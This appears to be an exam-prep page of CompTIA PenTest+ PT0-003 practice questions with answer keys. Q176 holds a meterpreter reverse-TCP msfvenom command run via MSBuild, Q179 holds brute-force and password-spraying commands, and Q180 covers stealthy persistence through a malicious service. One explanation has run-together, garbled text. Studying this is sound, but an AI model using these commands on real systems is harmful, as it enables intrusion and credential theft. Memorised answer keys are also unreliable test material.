CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 171:

  Which of the following can an access control vestibule help deter?

  A. USB drops
  B. Badge cloning
  C. Lock picking
  D. Tailgating
  D. Tailgating

• Question 172:

  Which of the following would most likely reduce the possibility of a client rejecting the final deliverable for a penetration test?

  A. Goal reprioritization
  B. Stakeholder alignment
  C. Non-disclosure agreement
  D. Business impact analysis
  B. Stakeholder alignment

  ---

  Explanation

  Stakeholder alignment is the most effective way to prevent deliverable rejection because it ensures everyone agrees-before testing begins-on scope, objectives, success criteria, assumptions, constraints, and what the final report will contain. PenTest+ pre-engagement activities stress confirming stakeholders (technical owners, management, legal/compliance) share the same understanding of rules of engagement, in-scope/out-of-scope targets, testing windows, permitted techniques, evidence handling, and reporting requirements (format, depth, risk rating method, and required artifacts). When these expectations are aligned early, the final deliverable is far less likely to be rejected for being "the wrong kind of report," missing required sections, violating constraints, or addressing the wrong priorities.

  Goal reprioritization can occur mid-engagement, but it does not inherently prevent rejection and can actually introduce mismatch if not formally managed. An NDA supports confidentiality but does not define acceptance criteria for the report. Business impact analysis strengthens findings, yet it is usually a component shaped by stakeholder expectations-so alignment is the primary factor that reduces rejection risk.

• Question 173:

  A penetration tester is performing a security review of a web application.

  Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

  A. VM
  B. IAST
  C. DAST
  D. SCA
  D. SCA

  ---

  Explanation

  Software Composition Analysis (SCA) is used to analyze dependencies in applications and identify vulnerable open-source libraries.

  Option A (VM - Virtual Machine): A VM is a computing environment, not a vulnerability detection tool.

  Option B (IAST - Interactive Application Security Testing): IAST analyzes runtime behavior, but it does not specialize in detecting vulnerable libraries.

  Option C (DAST - Dynamic Application Security Testing): DAST scans running applications for vulnerabilities, but it does not analyze open-source libraries.

  Option D (SCA - Software Composition Analysis): Correct.

  Identifies security flaws in dependencies.

  Used for managing supply chain risks.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Software Composition Analysis (SCA)

• Question 174:

  A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster.

  Which of the following tools would be best to use for this purpose?

  A. NSE
  B. Nessus
  C. CME
  D. Trivy
  D. Trivy

  ---

  Explanation

  Trivy is a specialized open-source vulnerability scanner designed for containers and container orchestration environments. It scans container images, file systems, and Git repositories for vulnerabilities and misconfigurations.

  According to the CompTIA PenTest+ PT0-003 Study Guide, in discussions about tool selection for containerized environments:

  "Trivy is optimized for scanning Docker images and Kubernetes clusters, offering fast and reliable vulnerability detection."

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 4

• Question 175:

  A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

  Which of the following commands should be used to accomplish the goal?

  A. VRFY and EXPN
  B. VRFY and TURN
  C. EXPN and TURN
  D. RCPT TO and VRFY
  A. VRFY and EXPN

  ---

  Explanation

  The VRFY and EXPN commands can be used to enumerate user accounts on an SMTP server, as they are used to verify the existence of users or mailing lists. VRFY (verify) asks the server to confirm that a given user name or address is valid. EXPN (expand) asks the server to expand a mailing list into its individual members. These commands can be used by a penetration tester to identify valid user names or e-mail addresses on the target SMTP server.

  References:

  https://hackerone.com/reports/193314

• Question 176:

  A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

  The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.

  Which of the following commands would most likely be used by the tester to continue with the attack on the host?

  A. regsvr32 /s /n /u C:\evil.xml
  B. MSBuild.exe C:\evil.xml
  C. mshta.exe C:\evil.xml
  D. AppInstaller.exe C:\evil.xml
  B. MSBuild.exe C:\evil.xml

  ---

  Explanation

  The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can

  process XML files containing C# code:

  Understanding MSBuild.exe:

  Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It's commonly used to build .NET applications and can also execute code embedded in project files.

  Command Usage:

  Command: MSBuild.exe C:\evil.xml

  This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.

  Comparison with Other Commands:

  regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.

  mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C#

  code.

  AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.

  Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.

• Question 177:

  DRAG DROP

  A manager calls upon a tester to assist with diagnosing an issue within the following:

  Python script: #!/usr/bin/python s = “Administrator”

  The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all.

  Select and Place:

  

  

• Question 178:

  During an engagement, a penetration tester receives a list of target systems and wants to enumerate them

  for possible vulnerabilities. The tester finds the following script on the internet:

  

  After running the script, the tester runs the following command:

  

  Which of the following should the tester do next?

  A. Replace line 4 with the following: api = "/api/v2/getToken/data/id/None"
  B. Insert the following line before line 6: target = target.split(" ")[0]
  C. Insert the following line before line 7: url = url.lstrip(' http://')
  D. Replace line 7 with the following: response = requests.post(url, api)
  B. Insert the following line before line 6: target = target.split(" ")[0]

  ---

  Explanation

  f.readlines() returns each line including trailing newline and any extra fields (labels). Given targets.txt lines contain URL followed by a label separated by whitespace, target will contain "

  http://10.10.6.4/CompTIA-

  MR1\n ". Concatenating that directly with api yields an invalid URL. Splitting the line on whitespace and taking the first element (target.split(" ")[0] or better target.split()[0]) extracts just the URL (

  http://10.10.6.4/)beforebuildingurl=target+api.Thisremovesthedescriptivelabelandnewlinesotheresultingurlisvalid.Whynottheothers:OptionA:ChangesAPIformatincorrectly.

  Option C: Stripping

  http://would

  make an invalid absolute URL for requests.post.OptionD:Passingapiasthesecondpositionalparametertorequests.postiswrong(itexpectsdata=orjson=),anddoesn'tfixtheproblemofextralabeltextintarget.PT0-003mapping:Domain4--robustparsingandinputsanitizationwhenreusingscripts.

• Question 179:

  A penetration tester is evaluating the security of a corporate client's web application using federated access.

  Which of the following approaches has the least possibility of blocking the IP address of the tester's machine?

  A. for user in $(cat users.txt); do for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -sq -XPOST https://example.com/login.asp-d "username=$user&password=$pass" | grep "Welcome" && echo "OK: $user $pass" done done
  B. spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.plan spray365.py spray target.plan
  C. import requests, pathlib users = pathlib.Path("users.txt").read_text() passwords = pathlib.Path("passwords.txt").read_text() for user in users: for pass in passwords: r = requests.post("https://example.com", data=f"username={user}&password={pass}", headers={"user-agent":"Mozilla/5.0"}) if "Welcome" in r.text: print(f"OK: {user} {pass}")
  D. hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <domain_ip> http-post-form "/ login.asp:username=^USER^&password=^PASS^:Invalid Password"
  B. spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.plan spray365.py spray target.plan

  ---

  Explanation

  PenTest+ differentiates password spraying from brute-force attacks. Brute force (as shown in A, C, and D) rapidly tests many passwords per user, producing a high rate of failed logins that commonly triggers defensive controls such as rate limiting, account lockout policies, WAF or IDS alerts, and IP reputation blocks. This is especially true in federated authentication flows, where identity providers and reverse proxies log and correlate repeated failures.

  Option B reflects a spraying approach that is designed to be low-and-slow and policy-aware. A spraying tool that supports building an execution plan and adding delays between authentication attempts reduces the likelihood of crossing thresholds that cause automated blocking. In PenTest+ terms, this aligns with conducting authentication testing in a controlled manner to avoid service disruption and to minimize detection while still validating whether weak or reused passwords exist.

  Therefore, the spraying approach with built-in pacing and planning has the least likelihood of blocking the tester's IP address.

• Question 180:

  A tester compromises a target host and then wants to maintain persistent access.

  Which of the following is the best way for the attacker to accomplish the objective?

  A. Configure and register a service.
  B. Install and run remote desktop software.
  C. Set up a script to be run when users log in.
  D. Perform a kerberoasting attack on the host.
  A. Configure and register a service.

  ---

  Explanation

  Configuring and Registering a Service:

  Registering a malicious service ensures that it starts automatically with the system, providing persistence even after reboots.

  This method is stealthier than others and is commonly used in advanced persistent threat (APT) scenarios.

  Why Not Other Options?

  Option B (Remote desktop software): Installing such software is noisy and can easily be detected by monitoring tools.

  Option C (User logon script): While it provides persistence, it is less reliable and more detectable than a system service.

  Option D (Kerberoasting): This is a credential-stealing technique and does not establish persistence.

  References:

  Domain 3.0 (Attacks and Exploits) Domain 4.0 (Penetration Testing Tools)